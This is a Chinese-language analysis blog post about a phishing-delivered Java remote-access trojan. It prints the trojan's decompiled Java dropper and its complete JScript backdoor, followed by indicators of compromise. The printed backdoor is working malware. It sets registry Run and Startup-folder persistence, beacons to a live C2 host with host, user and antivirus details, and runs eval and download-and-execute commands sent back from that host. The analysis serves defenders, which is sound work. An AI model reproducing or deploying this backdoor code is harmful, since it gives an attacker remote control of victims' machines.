日常巡逻检查某APT预警系统告警,发现一个java写的简单远控木马告警,投递手段为钓鱼邮件,样本通过反射机制和简单的混淆与编码多次打包后门代码。后门代码主要功能为下载文件并写入注册表开机启动实现持久化。
后门代码中包含有如下说明:”// Coded by v_B01 | Sliemerez -> Twitter : Sliemerez”,一个真实存在的阿拉伯人,他注册了多个社交账号,并且有投稿编程教程视频,🐂。根据这篇帖子”https://gathering.tweakers.net/forum/list_messages/1755533“,早在2017年他就开始投递该木马,4年来后门代码基本未变,🐂。
记录
样本反编译代码如下:
package uooypovlas;import java.io.FileOutputStream;import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.lang.reflect.Method;import java.util.ArrayList;public class Mkhlxhzrhig {private static final String liver$$$_$ = "wscript";private static void dejo$$$(OutputStream paramOutputStream, byte[] paramArrayOfByte) throws IOException {paramOutputStream.write(paramArrayOfByte);paramOutputStream.flush();paramOutputStream.close();}private static final String webpackVersioning = "resources/bynueqmffo"; private static final String _$JokerGame = "user.home";private static void exe(Method paramMethod) throws InvocationTargetException, IllegalAccessException, IOException { new Runtime[2][1] = (new Runtime[2][0] = null).getRuntime(); new Runtime[2][1].exec((String[])paramMethod.invoke(new Mkhlxhzrhig(), new Object[0])); }private static String vickSon$$(InputStream paramInputStream, StringBuilder paramStringBuilder) throws IOException { return getFidia$$$(paramInputStream, paramStringBuilder).toString(); }public static void main(String[] paramArrayOfString) throws Exception {if (new String[0].length == 0) {Method method = Mkhlxhzrhig.class.getDeclaredMethod("dollar$$", new Class[0]);exe(method);}}private static StringBuilder getFidia$$$(InputStream paramInputStream, StringBuilder paramStringBuilder) throws IOException {byte[] arrayOfByte = new byte[1024]; int i;while ((i = paramInputStream.read(arrayOfByte, 0, arrayOfByte.length)) > 0) {paramStringBuilder.append(new String(arrayOfByte, 0, i));}return paramStringBuilder;}private static String[] dollar$$() throws Exception {ArrayList arrayList = new ArrayList(Arrays.asList(engine$$$$(colllll$())));arrayList.remove(1);return (String[])arrayList.toArray(new String[0]);}private static String[] engine$$$$(byte[] paramArrayOfByte) throws NoSuchMethodException, FileNotFoundException, InvocationTargetException, IllegalAccessException {StringBuilder stringBuilder = new StringBuilder();stringBuilder.append(System.getProperty("user.home"));stringBuilder.append(File.separator);stringBuilder.append("_output.js");String[] arrayOfString = { "wscript", "__$", stringBuilder.toString() };FileOutputStream fileOutputStream = new FileOutputStream(arrayOfString[2]);Mkhlxhzrhig.class.getDeclaredMethod("dejo$$$", new Class[] { OutputStream.class, byte[].class }).invoke(new Mkhlxhzrhig(), new Object[] { fileOutputStream, paramArrayOfByte });return arrayOfString;}private static byte[] colllll$() throws Exception { return vickSon$$(Mkhlxhzrhig.class.getResourceAsStream("resources/bynueqmffo"), new StringBuilder()).getBytes(); }}
后门代码:
// Coded by v_B01 | Sliemerez -> Twitter : Sliemerezvar j = ["WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "|V|";var Ch = "\\";var VN = "MYYEAR" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "SEJOKAOI5S";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://javaslinns.duia.ro:1333/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.volumeserialnumber;break;}}}function Ns() {try {sh.RegWrite(g[0] + g[3] + "SEJOKAOI5S","\"" + fu + "\"",g[5]);} catch(err) {}try {var ap = Cr(2);fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn,true);} catch(err) {}}
IOC
15332@ms61.hinet.net
l5332@ms61.hinet.net
hxxp://javaslinns.duia[.]ro:1333/
A29562CBDE90B5915698EAA6680F225C
若有收获,就点个赞吧
0 人点赞
